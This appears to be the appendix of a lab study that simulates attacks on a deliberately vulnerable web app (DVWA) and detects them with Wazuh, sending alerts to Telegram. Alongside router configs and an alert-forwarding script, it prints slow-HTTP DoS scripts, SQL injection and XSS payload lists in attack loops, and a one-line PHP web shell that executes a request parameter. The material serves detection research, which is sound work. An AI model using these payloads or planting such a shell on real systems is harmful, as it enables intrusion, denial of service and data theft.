

Real-time Attack Simulation and Detection Using WAZUH and Telegram Alerts

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A. Network Configuration

Table 1 Switch Core Configuration

```
hostname core-switch
!
interface Ethernet0/0
description TO-RTR-USER
ip address 10.10.10.1 255.255.255.252
duplex auto
!
interface Ethernet0/1
description TO-RTR-SF
ip address 10.10.10.5 255.255.255.252
duplex auto
!
interface Ethernet0/2
description TO-RTR-DMZ
ip address 10.10.10.9 255.255.255.252
duplex auto
!
interface Ethernet0/3
description TO-RTR-MGMT
ip address 10.10.10.13 255.255.255.252
duplex auto
!
interface Ethernet1/3
description TO-Host-Machine
ip address 10.10.11.2 255.255.255.252
duplex auto
!
ip route 0.0.0.0 0.0.0.0 10.10.11.1
ip route 10.10.20.0 255.255.255.0 10.10.10.6
ip route 172.16.0.0 255.255.255.0 10.10.10.14
ip route 172.16.32.0 255.255.255.0 10.10.10.10
ip route 192.168.1.0 255.255.255.0 10.10.10.2
!
end
```

Configuration of Switch Core configuring interface IP address and routing to all other segment

Table 2 SF Segment Router Configuration

```
hostname gw-sf
!
interface Ethernet0/0
description TO-SF
ip address 10.10.20.1 255.255.255.0
duplex auto
!
interface Ethernet0/3
description TO-SW-CORE
ip address 10.10.10.6 255.255.255.252
duplex auto
!
ip route 0.0.0.0 0.0.0.0 10.10.10.5
ip route 172.16.0.0 255.255.255.0 10.10.10.5
```

```

ip route 172.16.32.0 255.255.255.0 10.10.10.5
!
access-list 100 deny ip 192.168.0.0 0.0.0.255 10.10.20.0 0.0.0.255
access-list 100 permit ip any any
!
end

```

Configuration of SF Segment Router configuring interface IP address and routing to segment DMZ and Administrator, also add access list deny from user segment

Table 3 DMZ Segment Router Configuration

```

hostname gw-dmz
!
interface Ethernet0/0
description T0-DMZ
ip address 172.16.32.1 255.255.255.0
duplex auto
!
interface Ethernet0/3
description T0-SW-CORE
ip address 10.10.10.10 255.255.255.252
duplex auto
!
ip route 0.0.0.0 0.0.0.0 10.10.10.9
!
end

```

Configuration of DMZ Segment Router configuring interface IP address and routing to all other segment

Table 4 MGMT Segment Router Configuration

```

hostname gw-mgmt
!
interface Ethernet0/0
description T0-MGMT
ip address 172.16.0.1 255.255.255.0
duplex auto
!
interface Ethernet0/3
description T0-SW-CORE
ip address 10.10.10.14 255.255.255.252
duplex auto
!
ip route 10.10.20.0 255.255.255.0 10.10.10.13
ip route 172.16.32.0 255.255.255.0 10.10.10.13
!
end

```

Configuration of MGMT Segment Router configuring interface IP address and routing to all other segment

Table 5 User Segment Router Configuration

```

hostname gw-user
!
interface Ethernet0/0
description T0-USER
ip address 192.168.1.1 255.255.255.0
duplex auto
!
interface Ethernet0/3
description T0-SW-CORE
ip address 10.10.10.2 255.255.255.252
duplex auto

```

```
!  
ip route 172.16.32.0 255.255.255.0 10.10.10.1  
!  
end
```

Configuration of MGMT Segment Router configuring interface IP address and routing to all other segment

B. Custom Script Telegram Notification

Table 6 Telegram Integration Script

```
#!/usr/bin/env python3  
# -*- coding: utf-8 -*-  
  
import sys  
import json  
from datetime import datetime  
import requests  
import pytz  
  
# Chat ID for sending messages  
CHAT_ID = "-xxxxxx76"  
  
def create_message(json_alert):  
    """  
    Creates a formatted message from the JSON alert data.  
  
    Args:  
        json_alert (dict): JSON data containing alert information.  
  
    Returns:  
        str: A JSON string containing the formatted message for the  
alert.  
    """  
    # Extract information from the alert  
    timestamp = json_alert.get('timestamp', '')  
    alert_id = json_alert.get('id', '')  
    alert_time = json_alert.get('timestamp', '')  
  
    # Parse timestamp to datetime object if available  
    if alert_time:  
        time_object = datetime.strptime(alert_time,  
'%Y-%m-%dT%H:%M:%S.%fz')  
  
        # Convert time to UTC+7  
        timezone_utc7 = pytz.timezone('Asia/Jakarta')  
        time_object_utc7 = time_object.astimezone(timezone_utc7)  
  
        # Reformat to "time and date" (HH:MM:SS, DD-MM-YYYY) in UTC+7  
        alert_time = time_object_utc7.strftime('%H:%M:%S, %d-%m-%Y')  
  
    # Extract other alert details  
    title = json_alert.get('rule', {}).get('description', '')  
    full_log = json_alert.get('full_log', '').replace("\n", "\n")  
    # Validate and truncate the full log if necessary  
    if len(full_log) > 345:  
        full_log = full_log[:345] + " [Log truncated for length]"  
    source_ip = json_alert.get('data', {}).get('srcip', '')  
    alert_level = json_alert.get('rule', {}).get('level', '')
```

```

groups = ', '.join(json_alert.get('rule', {}).get('groups',
[])).replace('_', '-')
rule_id = json_alert.get('rule', {}).get('id', '')
agent_name = json_alert.get('agent', {}).get('name', '')
agent_id = json_alert.get('agent', {}).get('id', '')
agent_ip = json_alert.get('agent', {}).get('ip', '')
mitre_tactic = ', '.join(json_alert.get('rule', {}).get('mitre',
{}).get('tactic', []))
mitre_technique = ', '.join(json_alert.get('rule', {}).get('mitre',
{}).get('technique', []))

# Format the message with markdown
message_content = '*⚠️WARNING⚠️*\n'
message_content += 'High-Level Security Alert\n\n'
message_content += f'*Name:* {title}\n\n'
message_content += f'*Timestamp:* {timestamp}\n'
message_content += f'*ID:* {alert_id}\n'
message_content += f'*Time:* {alert_time} UTC+7\n'

# Add source IP information if available
if source_ip:
    message_content += f'*Source IP:* {source_ip}\n'

message_content += f'*Groups:* {groups}\n'
message_content += f'*Rule:* {rule_id} (Level {alert_level})\n'

# Add agent information if available
if agent_name:
    message_content += f'*Agent:* {agent_name} ({agent_id}) IP:
{agent_ip}\n'

# Add MITRE Tactic and Technique information if available
if mitre_tactic and mitre_technique:
    message_content += f'*MITRE Tactic:* {mitre_tactic}\n'
    message_content += f'*MITRE Technique:* {mitre_technique}\n'

# Add the full Log
message_content += f'\n*Full Log:* ```\n{full_log}```\n'

# Create the JSON message data
message_data = {
    'chat_id': CHAT_ID,
    'text': message_content,
    'parse_mode': 'markdown'
}

# Debug information (can be used for logging)
log_debug_info('MESSAGE', message_data)

return json.dumps(message_data)

def send_alert(url_hook, message_data):
    """
    Sends an HTTP POST request with the message data to the specified
    webhook URL.

    Args:
        url_hook (str): The webhook URL to which the message will be
        sent.

```

```

        message_data (str): The JSON string containing the alert
        message.

    Returns:
        Response object: The response from the HTTP POST request.
    """
    headers = {'content-type': 'application/json', 'Accept-Charset':
'UTF-8'}
    response = requests.post(url_hook, headers=headers,
data=message_data)

    # Debug information (for logging the response)
    log_debug_info('RESPONSE', response)

    return response

def log_debug_info(label, data):
    """
    Logs debugging information to the integrations log file.

    Args:
        label (str): A label indicating the type of information being
        logged.
        data (any): The data to log (can be a dictionary or any
        serializable object).
    """
    with open('/var/ossec/logs/integrations.log', 'a') as log_file:
        log_file.write(f'{label}: {data}\n')

def main():
    """
    Main function to read the alert file, process it, and send the
    formatted alert message.
    """
    # Read the alert file (passed as the first argument)
    with open(sys.argv[1]) as alert_file:
        json_alert = json.load(alert_file)

    # Get the webhook URL (passed as the third argument)
    url_hook = sys.argv[3]

    # Create the message from the alert
    message_data = create_message(json_alert)

    # Send the message to the specified webhook URL
    send_alert(url_hook, message_data)

    # Exit the program with a success status
    sys.exit(0)

# Entry point of the script
if __name__ == '__main__':
    main()

```

This script reads the security alert logs sent by Wazuh, which are provided in JSON format when a security event with level 10 or higher occurs. The script functions to format the

message to be sent to Telegram while ensuring that the full log is not excessively long, allowing the notification to be successfully delivered.

C. System Testing Script

Table 7 Script for Testing Access to Web Applications 100 Times

```
import requests
import time
from datetime import datetime

# Target URL Landing page
URL = "http://172.16.32.2/DVWA/"

# Cookie to maintain session in DVWA (change the security level
accordingly)
COOKIE = {'security': 'low'}

# Log file path
LOG_FILE = 'normal_request_web_log.txt'

# Open the log file for appending
with open(LOG_FILE, 'a') as log_file:
    # Loop to send 100 normal requests
    for i in range(1, 101):
        start_time = time.time() # Record the start time
        timestamp = datetime.now().strftime('%H:%M:%S.%f') # Get the
current time

        response = requests.get(URL, cookies=COOKIE)
        end_time = time.time() # Record the end time

        response_time = end_time - start_time # Calculate the response
time
        status_code = response.status_code # Get the response status
code

        # Log request details with timestamp
        log_entry = f"Request {i}: Timestamp: {timestamp}, Status Code:
{status_code}, Response Time: {response_time:.2f} ms\n"

        # Print to console
        print(log_entry.strip())

        # Save to log file
        log_file.write(log_entry)
```

Table 8 XSS Vulnerable Web URL Access Testing Script

```
import requests
import time
from datetime import datetime

# Target URL DVWA with vulnerable XSS page
XSS_URL = "http://172.16.32.2/DVWA/vulnerabilities/xss_r/?name=test"
```

```

# Cookie to maintain session in DVWA (change the PHPSESSID and security
Level accordingly)
COOKIES = {'PHPSESSID': 'your_session_id', 'security': 'low'}

# Log file path
LOG_FILE = 'normal_request_xss_url_log.txt'

# Open the log file for appending
with open(LOG_FILE, 'a') as log_file:
    # Loop to send 100 normal requests
    for i in range(1, 101):
        # Get the current timestamp (hour, minute, second)
        timestamp = datetime.now().strftime('%H:%M:%S.%f')

        # Measure time and capture the response code
        start_time = time.time() # Start time in seconds
        response = requests.get(XSS_URL, cookies=COOKIES)
        end_time = time.time() # End time in seconds

        # Calculate response time
        response_time = (end_time - start_time) * 1000 # Convert to
milliseconds
        status_code = response.status_code # Get the HTTP status code

        # Log request details with timestamp
        log_entry = f"Request {i}: Timestamp: {timestamp}, Status Code:
{status_code}, Response Time: {response_time:.2f} ms\n"

        # Print to console
        print(log_entry.strip())

        # Save to log file
        log_file.write(log_entry)

```

Table 9 SQLi Vulnerable Web URL Access Testing Script

```

import requests
import time
from datetime import datetime

# Target URL DVWA with vulnerable SQL injection page
SQL_URL =
"http://172.16.32.2/DVWA/vulnerabilities/sql_i/?id=1&Submit=Submit"

# Cookie to maintain session in DVWA (change the PHPSESSID and security
Level accordingly)
COOKIES = {'PHPSESSID': 'your_session_id', 'security': 'low'}

# Log file path
LOG_FILE = 'normal_request_sql_log.txt'

# Open the log file for appending
with open(LOG_FILE, 'a') as log_file:
    # Loop to send 100 normal requests
    for i in range(1, 101):
        # Get the current timestamp (hour, minute, second)
        timestamp = datetime.now().strftime('%H:%M:%S.%f')

```

```

# Measure time and capture the response code
start_time = time.time() # Start time in seconds
response = requests.get(SQL_URL, cookies=COOKIES)
end_time = time.time() # End time in seconds

# Calculate response time
response_time = (end_time - start_time) * 1000 # Convert to
milliseconds
status_code = response.status_code # Get the HTTP status code

# Log request details with timestamp
log_entry = f"Request {i}: Timestamp: {timestamp}, Status Code:
{status_code}, Response Time: {response_time:.2f} ms\n"

# Print to console
print(log_entry.strip())

# Save to log file
log_file.write(log_entry)

```

Table 10 Slow HTTP GET DDoS Attack Script

```

import subprocess
from datetime import datetime

# Target URL DVWA
TARGET_URL = "http://172.16.32.2/DVWA/"

# Log file to save results
log_file_path = "slow_http_dos_get_attack.log"

def log_message(message):
    """Function to log messages to the log file and print to console"""
    with open(log_file_path, "a") as log_file:
        log_file.write(message + "\n")
    print(message)

# Get the current timestamp (hour, minute, second)
start_timestamp = datetime.now().strftime('%H:%M:%S.%f')

# Log and print the start of the attack
log_message(f"Timestamp: {start_timestamp}, Slow HTTP DoS attack started
on {TARGET_URL}")

# Perform Slow HTTP DoS attack with 1000 requests using subprocess
try:
    result = subprocess.run(
        ["slowhttptest", "-c", "1000", "-H", "-i", "10", "-r", "200", "-t", "GET", "-u", TARGET_URL, "-x", "24", "-p", "3", "-l", "300"],
        capture_output=True,
        text=True
    )

    # Log and print the output from the command
    log_message(result.stdout)
    log_message(result.stderr)

```

```

except FileNotFoundError:
    log_message("Error: slowhttpstest is not installed or not found in
the system path.")
except Exception as e:
    log_message(f"An error occurred: {e}")

# Get the current timestamp (hour, minute, second)
end_timestamp = datetime.now().strftime('%H:%M:%S.%f')

# Log and print the end of the attack
log_message(f"Timestamp: {end_timestamp}, Slow HTTP DoS attack finished
on {TARGET_URL}")

```

Table 11 DDoS Attack Script Slow HTTP POST

```

import subprocess
from datetime import datetime

# Target URL DVWA
TARGET_URL = "http://172.16.32.2/DVWA/"

# Log file to save results
log_file_path = "slow_http_dos_post_attack.log"

def log_message(message):
    """Function to log messages to the log file and print to console"""
    with open(log_file_path, "a") as log_file:
        log_file.write(message + "\n")
    print(message)

# Get the current timestamp (hour, minute, second)
start_timestamp = datetime.now().strftime('%H:%M:%S.%f')

# Log and print the start of the attack
log_message(f"Timestamp: {start_timestamp}, Slow HTTP DoS attack started
on {TARGET_URL}")

# Perform Slow HTTP DoS attack with 1000 requests using subprocess
try:
    result = subprocess.run(
        ["slowhttpstest", "-c", "1000", "-H", "-i", "10", "-r", "200", "-
t", "POST", "-u", TARGET_URL, "-x", "24", "-p", "3", "-l", "300"],
        capture_output=True,
        text=True
    )

    # Log and print the output from the command
    log_message(result.stdout)
    log_message(result.stderr)

except FileNotFoundError:
    log_message("Error: slowhttpstest is not installed or not found in
the system path.")
except Exception as e:
    log_message(f"An error occurred: {e}")

```



```

    "' OR EXISTS(SELECT 1)--",
    "UNION ALL SELECT 1,2#",
    "' or pg_sleep(5)--",
    "' OR 1 -- -",
    "' OR ' = '",
    "AS INJECTX WHERE 1=1 AND 1=1",
    "WHERE 1=1 AND 1=1",
    "';waitfor delay '0:0:5'--",
    "');waitfor delay '0:0:5'--"
]

# Cookie to maintain session in DVWA (change the PHPSESSID and security
level accordingly)
COOKIES = {'PHPSESSID': 'your_session_id', 'security': 'low'}

# Log file path
LOG_FILE = 'attack_request_sqli_log.txt'

# Specify headers to make the request resemble a browser request
headers = {
    "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0)
Gecko/20100101 Firefox/131.0",
    "Referer": "http://172.16.32.2/DVWA/vulnerabilities/sqli/"
}

count = 1
# Open the log file for appending
with open(LOG_FILE, 'a') as log_file:
    # Loop to send 100 normal requests
    for i in PAYLOAD:
        # Target URL DVWA with vulnerable SQL injection page
        base_url = "http://172.16.32.2/DVWA/vulnerabilities/sqli/"
        params = {
            "id": i,
            "Submit": "Submit"
        }

        # Encode the parameters using quote_plus
        encoded_params = urlencode(params, quote_via=quote_plus)
        SQL_URL = f"{base_url}?{encoded_params}"

        # Get the current timestamp (hour, minute, second)
        timestamp = datetime.now().strftime('%H:%M:%S.%F')

        # Measure time and capture the response code
        start_time = time.time() # Start time in seconds
        response = requests.get(SQL_URL, cookies=COOKIES,
headers=headers)
        end_time = time.time() # End time in seconds

        # Calculate response time
        response_time = (end_time - start_time) * 1000 # Convert to
milliseconds
        status_code = response.status_code # Get the HTTP status code

        # Log request details with timestamp
        log_entry = f"Request {count}: Timestamp: {timestamp}, Status
Code: {status_code}, Response Time: {response_time:.2f} ms\n"
        count += 1

```

```

# Print to console
print(log_entry.strip())

# Save to Log file
log_file.write(log_entry)

```

Table 13 XSS Vulnerable Web URL Attack Testing Script

```

import requests
import time
from datetime import datetime
from urllib.parse import urlencode, quote_plus

PAYLOAD = [
    "<script>alert('XSS')</script>",
    "<body onload=alert('XSS')>",
    "'><script>alert(String.fromCharCode(88,83,83))</script>",
    "<img src='x' onerror='alert(\"XSS\")'>",
    "\"><script>alert('XSS')</script>",
    "<math><mtext></mtext><script>alert('XSS')</script></math>",
    "<iframe src='javascript:alert(\"XSS\")'></iframe>",
    "<img src='x' onerror='alert(\"XSS\")'>",
    "<svg><desc><![CDATA[</desc><script>alert('XSS')</script>]]>",
    "<input onfocus=alert('XSS') autofocus>",
    "<img src='javascript:alert(\"XSS\")'>",
    "<input value=''><script>alert(1)</script>",
    "<iframe src='javascript:alert(\"XSS\")'></iframe>",
    "<iframe srcdoc='<script>alert('XSS')</script>'></iframe>",
    "<script src='data:text/plain,alert(\"XSS\")'></script>",
    "<math><title><![CDATA[</title><script>alert('XSS')</script>]]>",
    "<a href='javas\u0000cript:alert(\"XSS\")'>Click me</a>",
    "<math
xmlns='http://www.w3.org/1998/Math/MathML'><mtext></mtext><script>alert(
'XSS')</script></math>",
    "<iframe srcdoc='<svg onload=alert(1)>'>",
    "<style>@keyframes
x{}</style><style>@x{}</style><script>alert(1)</script>",
    "<script src='data:text/javascript,alert(1)'></script>",
    "<math><annotation-xml
encoding='text/html'><svg><script>alert(1)</script></svg></annotation-
xml></math>",
    "<img src=x onerror='\"alert(1)\">",
    "<script>alert(/XSS/)</script>",
    "<input type='\"text\"' value='\"\"' autofocus onfocus='\"alert(1)\">",
    "<input onmouseover=alert(1)>",
    "<input onblur=alert(1) autofocus>",
    "<img src onerror='\"alert(1)\">",
    "<img src=x onerror=alert(1)//>",
    "<img src=x onerror=alert('XSS')>",
    "<input type='\"text\"' value='\"XSS\"' onfocus=alert('XSS')>",
    "<iframe src='\"javascript:alert('XSS');\"></iframe>",
    "<!--<script>alert('XSS')</script>-->",
    "<svg onload=alert('XSS')>",
    "<form action='\"javascript:alert('XSS');\"><input type=submit>",
    "<script>console.log(document.cookie)</script>",

```

```

"<script>console.log(navigator.userAgent)</script>",
"<script>console.log(document.URL)</script>",
"<img src='x' onerror='console.log(document.cookie)'>",
"<input onblur='console.log(document.URL)' autofocus>",
"<body onload=console.log(navigator.userAgent)>",
"<script>console.log(location.href)</script>",
"<form action='javascript:console.log(document.cookie)'><input
type=submit>",
  "<input type=\"text\" value=\"\" autofocus
onfocus=\"console.log(location.href)\">",
  "<img src='x' onerror='alert(document.referrer)'>",
  "<img src='x' onerror='alert(document.body.innerHTML)'>",
  "<script>document.write(document.lastModified)</script>",
  "<iframe
srcdoc='<script>alert(document.cookie)</script>'></iframe>",
  "<script>fetch('/').then(response =>
response.text().then(alert))</script>",
  "<iframe srcdoc='<script>alert(document.title)</script>'></iframe>"
]

# Target URL DVWA with vulnerable XSS page
XSS_URL = "http://172.16.32.2/DVWA/vulnerabilities/xss_r/?name="

# Cookie to maintain session in DVWA (change the PHPSESSID and security
level accordingly)
COOKIES = {'PHPSESSID': 'your_session_id', 'security': 'low'}

# Log file path
LOG_FILE = 'attack_request_xss_log.txt'

# Specify headers to make the request resemble a browser request
headers = {
  "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0)
Gecko/20100101 Firefox/131.0",
  "Referer": "http://172.16.32.2/DVWA/vulnerabilities/xss_r/"
}
count = 1

# Open the log file for appending
with open(LOG_FILE, 'a') as log_file:
  # Loop to send 100 normal requests
  for i in PAYLOAD:
    # Target URL DVWA with vulnerable XSS injection page
    base_url = "http://172.16.32.2/DVWA/vulnerabilities/xss_r/"
    params = {
      "name": i,
    }

    # Encode the parameters using quote_plus
    encoded_params = urlencode(params, quote_via=quote_plus)
    SQL_URL = f"{base_url}?{encoded_params}"

    # Get the current timestamp (hour, minute, second)
    timestamp = datetime.now().strftime('%H:%M:%S.%f')

    # Measure time and capture the response code
    start_time = time.time() # Start time in seconds

```

```
response = requests.get((XSS_URL+i), cookies=COOKIES,
headers=headers)
end_time = time.time() # End time in seconds

# Calculate response time
response_time = (end_time - start_time) * 1000 # Convert to
milliseconds
status_code = response.status_code # Get the HTTP status code

# Log request details with timestamp
log_entry = f"Request {count}: Timestamp: {timestamp}, Status
Code: {status_code}, Response Time: {response_time:.2f} ms\n"
count += 1

# Print to console
print(log_entry.strip())

# Save to log file
log_file.write(log_entry)
```

Table 14 PHP Shell Files

```
<?php
if(isset($_REQUEST['cmd'])) {
    $cmd = $_REQUEST['cmd'];
    system($cmd);
}
?>
```